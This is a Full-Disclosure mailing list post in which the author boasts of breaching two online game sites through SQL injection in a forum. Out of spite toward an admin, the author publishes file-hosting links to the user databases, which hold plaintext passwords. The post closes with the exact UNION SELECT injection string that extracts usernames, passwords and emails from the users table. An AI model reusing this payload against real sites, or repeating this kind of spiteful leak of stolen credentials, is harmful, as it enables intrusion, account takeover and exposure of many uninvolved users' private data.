Nother game, nother haxed db
2 games
pokerrpg.com
and
bcwars.com
over 100k users each
admin used plaintext passwords
how dumb
got in thru sql injection in the forum
tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him
bcwars
[
bit.ly]
[
rapidshare.com]
[
www.megaupload.com]
[
depositfiles.com]
[
hotfile.com]
[
www.zshare.net]
[
uploading.com]
pokerrpg
[
bit.ly]
[
rapidshare.com]
[
www.megaupload.com]
[
depositfiles.com]
[
hotfile.com]
[
www.zshare.net]
[
uploading.com]
injection was
[
bcwars.com]' union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -
_______________________________________________
Full-Disclosure - We believe in it.
Charter: [
lists.grok.org.uk]
Hosted and sponsored by Secunia - [
secunia.com]